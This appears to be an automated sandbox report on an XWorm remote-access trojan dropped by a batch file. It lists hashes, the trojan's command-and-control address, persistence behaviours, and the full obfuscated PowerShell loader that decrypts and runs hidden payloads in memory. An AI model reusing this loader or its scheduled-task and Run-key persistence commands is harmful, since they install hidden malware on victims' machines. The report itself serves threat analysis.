Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
26/04/2024, 17:59
Static task
static1
Behavioral task
behavioral1
Sample
UpdatedLoader.bat
Resource
win11-20240419-en
General
-
Target
UpdatedLoader.bat
-
Size
289KB
-
MD5
c0f748026877b82917b187db4f323302
-
SHA1
9741a92d9326b4b1464c0447091700780753adf6
-
SHA256
8d6a1f82b25b86ff7edc38ea114090567b431b0e96b66a2762dd1d1b60606cd7
-
SHA512
5119cec679deb07183f1f892789ac6f255854cf962f058892d8fc695b5589a21733780f0f4d94f770854de4bfa072d6097d9d1fd6f99683e31f234054e28ae70
-
SSDEEP
6144:WZxZqATF+Us3xiOITyaWPhjWC67GJgqLsCHE:WZxZqATF+bx2Tyag4F7GJgjOE
Malware Config
Extracted
xworm
127.0.0.1:36797
allows-bass.gl.at.ply.gg:36797
-
Install_directory
%Temp%
-
install_file
client.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3280-42-0x000002C74EDB0000-0x000002C74EDC6000-memory.dmp family_xworm -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4912 client.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000\Software\Microsoft\Windows\CurrentVersion\Run\client = "C:\\Users\\Admin\\AppData\\Local\\Temp\\client.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4228 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-891789021-684472942-1795878712-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3624 powershell.exe 3624 powershell.exe 2508 powershell.exe 2508 powershell.exe 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe 4912 client.exe 4912 client.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeSystemEnvironmentPrivilege 2508 powershell.exe Token: SeRemoteShutdownPrivilege 2508 powershell.exe Token: SeUndockPrivilege 2508 powershell.exe Token: SeManageVolumePrivilege 2508 powershell.exe Token: 33 2508 powershell.exe Token: 34 2508 powershell.exe Token: 35 2508 powershell.exe Token: 36 2508 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeSystemEnvironmentPrivilege 2508 powershell.exe Token: SeRemoteShutdownPrivilege 2508 powershell.exe Token: SeUndockPrivilege 2508 powershell.exe Token: SeManageVolumePrivilege 2508 powershell.exe Token: 33 2508 powershell.exe Token: 34 2508 powershell.exe Token: 35 2508 powershell.exe Token: 36 2508 powershell.exe Token: SeIncreaseQuotaPrivilege 2508 powershell.exe Token: SeSecurityPrivilege 2508 powershell.exe Token: SeTakeOwnershipPrivilege 2508 powershell.exe Token: SeLoadDriverPrivilege 2508 powershell.exe Token: SeSystemProfilePrivilege 2508 powershell.exe Token: SeSystemtimePrivilege 2508 powershell.exe Token: SeProfSingleProcessPrivilege 2508 powershell.exe Token: SeIncBasePriorityPrivilege 2508 powershell.exe Token: SeCreatePagefilePrivilege 2508 powershell.exe Token: SeBackupPrivilege 2508 powershell.exe Token: SeRestorePrivilege 2508 powershell.exe Token: SeShutdownPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeSystemEnvironmentPrivilege 2508 powershell.exe Token: SeRemoteShutdownPrivilege 2508 powershell.exe Token: SeUndockPrivilege 2508 powershell.exe Token: SeManageVolumePrivilege 2508 powershell.exe Token: 33 2508 powershell.exe Token: 34 2508 powershell.exe Token: 35 2508 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3280 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2952 2232 cmd.exe 80 PID 2232 wrote to memory of 2952 2232 cmd.exe 80 PID 2952 wrote to memory of 3432 2952 net.exe 81 PID 2952 wrote to memory of 3432 2952 net.exe 81 PID 2232 wrote to memory of 3624 2232 cmd.exe 83 PID 2232 wrote to memory of 3624 2232 cmd.exe 83 PID 3624 wrote to memory of 2508 3624 powershell.exe 84 PID 3624 wrote to memory of 2508 3624 powershell.exe 84 PID 3624 wrote to memory of 1124 3624 powershell.exe 87 PID 3624 wrote to memory of 1124 3624 powershell.exe 87 PID 1124 wrote to memory of 2152 1124 WScript.exe 88 PID 1124 wrote to memory of 2152 1124 WScript.exe 88 PID 2152 wrote to memory of 1896 2152 cmd.exe 90 PID 2152 wrote to memory of 1896 2152 cmd.exe 90 PID 1896 wrote to memory of 1848 1896 net.exe 91 PID 1896 wrote to memory of 1848 1896 net.exe 91 PID 2152 wrote to memory of 3280 2152 cmd.exe 92 PID 2152 wrote to memory of 3280 2152 cmd.exe 92 PID 3280 wrote to memory of 4228 3280 powershell.exe 93 PID 3280 wrote to memory of 4228 3280 powershell.exe 93 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UpdatedLoader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:3432
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Emg/s2Nqbhsh+IHYCyhmY5C8nNKJGCqMyuZe0+92Up0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('73puHVLJEGcUjNhG9zjGvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KqcjT=New-Object System.IO.MemoryStream(,$param_var); $HygAC=New-Object System.IO.MemoryStream; $Gnnyy=New-Object System.IO.Compression.GZipStream($KqcjT, [IO.Compression.CompressionMode]::Decompress); $Gnnyy.CopyTo($HygAC); $Gnnyy.Dispose(); $KqcjT.Dispose(); $HygAC.Dispose(); $HygAC.ToArray();}function execute_function($param_var,$param2_var){ $KKJtl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qznUp=$KKJtl.EntryPoint; $qznUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\UpdatedLoader.bat';$LfXux=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\UpdatedLoader.bat').Split([Environment]::NewLine);foreach ($mqLFK in $LfXux) { if ($mqLFK.StartsWith(':: ')) { $YCoDq=$mqLFK.Substring(3); break; }}$payloads_var=[string[]]$YCoDq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_84_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_84.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_84.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_84.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:1848
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Emg/s2Nqbhsh+IHYCyhmY5C8nNKJGCqMyuZe0+92Up0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('73puHVLJEGcUjNhG9zjGvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KqcjT=New-Object System.IO.MemoryStream(,$param_var); $HygAC=New-Object System.IO.MemoryStream; $Gnnyy=New-Object System.IO.Compression.GZipStream($KqcjT, [IO.Compression.CompressionMode]::Decompress); $Gnnyy.CopyTo($HygAC); $Gnnyy.Dispose(); $KqcjT.Dispose(); $HygAC.Dispose(); $HygAC.ToArray();}function execute_function($param_var,$param2_var){ $KKJtl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qznUp=$KKJtl.EntryPoint; $qznUp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_84.bat';$LfXux=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_84.bat').Split([Environment]::NewLine);foreach ($mqLFK in $LfXux) { if ($mqLFK.StartsWith(':: ')) { $YCoDq=$mqLFK.Substring(3); break; }}$payloads_var=[string[]]$YCoDq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "client" /tr "C:\Users\Admin\AppData\Local\Temp\client.exe"6⤵
- Creates scheduled task(s)
PID:4228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\client.exeC:\Users\Admin\AppData\Local\Temp\client.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
Filesize
289KB
MD5c0f748026877b82917b187db4f323302
SHA19741a92d9326b4b1464c0447091700780753adf6
SHA2568d6a1f82b25b86ff7edc38ea114090567b431b0e96b66a2762dd1d1b60606cd7
SHA5125119cec679deb07183f1f892789ac6f255854cf962f058892d8fc695b5589a21733780f0f4d94f770854de4bfa072d6097d9d1fd6f99683e31f234054e28ae70
-
Filesize
114B
MD5b646e0e79bea2e7e5adf588a91da0786
SHA1c68648153fb367081c6d19b97ad79b5627f2a8c3
SHA25667a886a3659fce83df76ced5eb6e3dae8d4cec3fa013c0c9724c9047fe7d16eb
SHA512189ff30fa164f740f1e6fe7525ab4de9fcfa003d6a1fb3f5d9e5699467bca3d3f3b8171a4a88b6d6d1b53b647e33fc9c473fbb63bc11d643e2a682736b6cc037